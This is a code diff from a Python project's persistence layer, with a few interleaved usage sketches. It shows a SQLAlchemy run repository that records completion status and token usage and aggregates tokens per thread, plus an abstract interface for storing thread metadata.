||||
row = await session.get(RunRow, run_id)
|
||||
if row is None:
|
||||
return
|
||||
if resolved_owner_id is not None and row.owner_id != resolved_owner_id:
|
||||
return
|
||||
await session.delete(row)
|
||||
await session.commit()
|
||||
|
||||
async def list_pending(self, *, before=None):
|
||||
if before is None:
|
||||
before_dt = datetime.now(UTC)
|
||||
elif isinstance(before, datetime):
|
||||
before_dt = before
|
||||
else:
|
||||
before_dt = datetime.fromisoformat(before)
|
||||
stmt = select(RunRow).where(RunRow.status == "pending", RunRow.created_at <= before_dt).order_by(RunRow.created_at.asc())
|
||||
async with self._sf() as session:
|
||||
result = await session.execute(stmt)
|
||||
return [self._row_to_dict(r) for r in result.scalars()]
|
||||
|
||||
async def update_run_completion(
|
||||
self,
|
||||
run_id: str,
|
||||
*,
|
||||
status: str,
|
||||
total_input_tokens: int = 0,
|
||||
total_output_tokens: int = 0,
|
||||
total_tokens: int = 0,
|
||||
llm_call_count: int = 0,
|
||||
lead_agent_tokens: int = 0,
|
||||
subagent_tokens: int = 0,
|
||||
middleware_tokens: int = 0,
|
||||
message_count: int = 0,
|
||||
last_ai_message: str | None = None,
|
||||
first_human_message: str | None = None,
|
||||
error: str | None = None,
|
||||
) -> None:
|
||||
"""Update status + token usage + convenience fields on run completion."""
|
||||
values: dict[str, Any] = {
|
||||
"status": status,
|
||||
"total_input_tokens": total_input_tokens,
|
||||
"total_output_tokens": total_output_tokens,
|
||||
"total_tokens": total_tokens,
|
||||
"llm_call_count": llm_call_count,
|
||||
"lead_agent_tokens": lead_agent_tokens,
|
||||
"subagent_tokens": subagent_tokens,
|
||||
"middleware_tokens": middleware_tokens,
|
||||
"message_count": message_count,
|
||||
"updated_at": datetime.now(UTC),
|
||||
}
|
||||
if last_ai_message is not None:
|
||||
values["last_ai_message"] = last_ai_message[:2000]
|
||||
if first_human_message is not None:
|
||||
values["first_human_message"] = first_human_message[:2000]
|
||||
if error is not None:
|
||||
values["error"] = error
|
||||
async with self._sf() as session:
|
||||
await session.execute(update(RunRow).where(RunRow.run_id == run_id).values(**values))
|
||||
await session.commit()
|
||||
|
||||
async def aggregate_tokens_by_thread(self, thread_id: str) -> dict[str, Any]:
|
||||
"""Aggregate token usage via a single SQL GROUP BY query."""
|
||||
_completed = RunRow.status.in_(("success", "error"))
|
||||
_thread = RunRow.thread_id == thread_id
|
||||
|
||||
stmt = (
|
||||
select(
|
||||
func.coalesce(RunRow.model_name, "unknown").label("model"),
|
||||
func.count().label("runs"),
|
||||
func.coalesce(func.sum(RunRow.total_tokens), 0).label("total_tokens"),
|
||||
func.coalesce(func.sum(RunRow.total_input_tokens), 0).label("total_input_tokens"),
|
||||
func.coalesce(func.sum(RunRow.total_output_tokens), 0).label("total_output_tokens"),
|
||||
func.coalesce(func.sum(RunRow.lead_agent_tokens), 0).label("lead_agent"),
|
||||
func.coalesce(func.sum(RunRow.subagent_tokens), 0).label("subagent"),
|
||||
func.coalesce(func.sum(RunRow.middleware_tokens), 0).label("middleware"),
|
||||
)
|
||||
.where(_thread, _completed)
|
||||
.group_by(func.coalesce(RunRow.model_name, "unknown"))
|
||||
)
|
||||
|
||||
async with self._sf() as session:
|
||||
rows = (await session.execute(stmt)).all()
|
||||
|
||||
total_tokens = total_input = total_output = total_runs = 0
|
||||
lead_agent = subagent = middleware = 0
|
||||
by_model: dict[str, dict] = {}
|
||||
for r in rows:
|
||||
by_model[r.model] = {"tokens": r.total_tokens, "runs": r.runs}
|
||||
total_tokens += r.total_tokens
|
||||
total_input += r.total_input_tokens
|
||||
total_output += r.total_output_tokens
|
||||
total_runs += r.runs
|
||||
lead_agent += r.lead_agent
|
||||
subagent += r.subagent
|
||||
middleware += r.middleware
|
||||
|
||||
return {
|
||||
"total_tokens": total_tokens,
|
||||
"total_input_tokens": total_input,
|
||||
"total_output_tokens": total_output,
|
||||
"total_runs": total_runs,
|
||||
"by_model": by_model,
|
||||
"by_caller": {
|
||||
"lead_agent": lead_agent,
|
||||
"subagent": subagent,
|
||||
"middleware": middleware,
|
||||
},
|
||||
}
|
||||
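A hedged sketch of how a worker might record completion stats and then read the per-thread rollup; it assumes an initialized engine/session factory, as in the lifecycle sketch earlier:

```python
# Hedged sketch: run/thread IDs and token counts are made up.
from deerflow.persistence import get_session_factory
from deerflow.persistence.run.sql import RunRepository


async def record_and_summarize() -> dict:
    repo = RunRepository(get_session_factory())
    await repo.put("run-1", thread_id="thread-1", owner_id="user-1", status="running")
    await repo.update_run_completion(
        "run-1",
        status="success",
        total_input_tokens=1200,
        total_output_tokens=300,
        total_tokens=1500,
        llm_call_count=3,
        lead_agent_tokens=1100,
        subagent_tokens=400,
        message_count=4,
        last_ai_message="Done.",
    )
    # Returns totals plus by_model / by_caller breakdowns for completed runs.
    return await repo.aggregate_tokens_by_thread("thread-1")
```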
@@ -0,0 +1,13 @@
|
||||
"""Thread metadata persistence — ORM, abstract store, and concrete implementations."""
|
||||
|
||||
from deerflow.persistence.thread_meta.base import ThreadMetaStore
|
||||
from deerflow.persistence.thread_meta.memory import MemoryThreadMetaStore
|
||||
from deerflow.persistence.thread_meta.model import ThreadMetaRow
|
||||
from deerflow.persistence.thread_meta.sql import ThreadMetaRepository
|
||||
|
||||
__all__ = [
|
||||
"MemoryThreadMetaStore",
|
||||
"ThreadMetaRepository",
|
||||
"ThreadMetaRow",
|
||||
"ThreadMetaStore",
|
||||
]
|
||||
@@ -0,0 +1,60 @@
|
||||
"""Abstract interface for thread metadata storage.
|
||||
|
||||
Implementations:
|
||||
- ThreadMetaRepository: SQL-backed (sqlite / postgres via SQLAlchemy)
|
||||
- MemoryThreadMetaStore: wraps LangGraph BaseStore (memory mode)
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import abc
|
||||
|
||||
|
||||
class ThreadMetaStore(abc.ABC):
|
||||
@abc.abstractmethod
|
||||
async def create(
|
||||
self,
|
||||
thread_id: str,
|
||||
*,
|
||||
assistant_id: str | None = None,
|
||||
owner_id: str | None = None,
|
||||
display_name: str | None = None,
|
||||
metadata: dict | None = None,
|
||||
) -> dict:
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def get(self, thread_id: str) -> dict | None:
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def search(
|
||||
self,
|
||||
*,
|
||||
metadata: dict | None = None,
|
||||
status: str | None = None,
|
||||
limit: int = 100,
|
||||
offset: int = 0,
|
||||
) -> list[dict]:
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def update_display_name(self, thread_id: str, display_name: str) -> None:
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def update_status(self, thread_id: str, status: str) -> None:
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def update_metadata(self, thread_id: str, metadata: dict) -> None:
|
||||
"""Merge ``metadata`` into the thread's metadata field.
|
||||
|
||||
Existing keys are overwritten by the new values; keys absent from
|
||||
``metadata`` are preserved. No-op if the thread does not exist.
|
||||
"""
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def delete(self, thread_id: str) -> None:
|
||||
pass
|
||||
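A tiny illustration of the merge contract described for `update_metadata` (incoming values win, untouched keys survive), shown on plain dicts with made-up keys:

```python
# Illustrative data only.
existing = {"title": "Q3 report", "tags": ["draft"]}
incoming = {"tags": ["final"], "reviewed": True}
merged = {**existing, **incoming}
# merged == {"title": "Q3 report", "tags": ["final"], "reviewed": True}
```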
Some files were not shown because too many files have changed in this diff.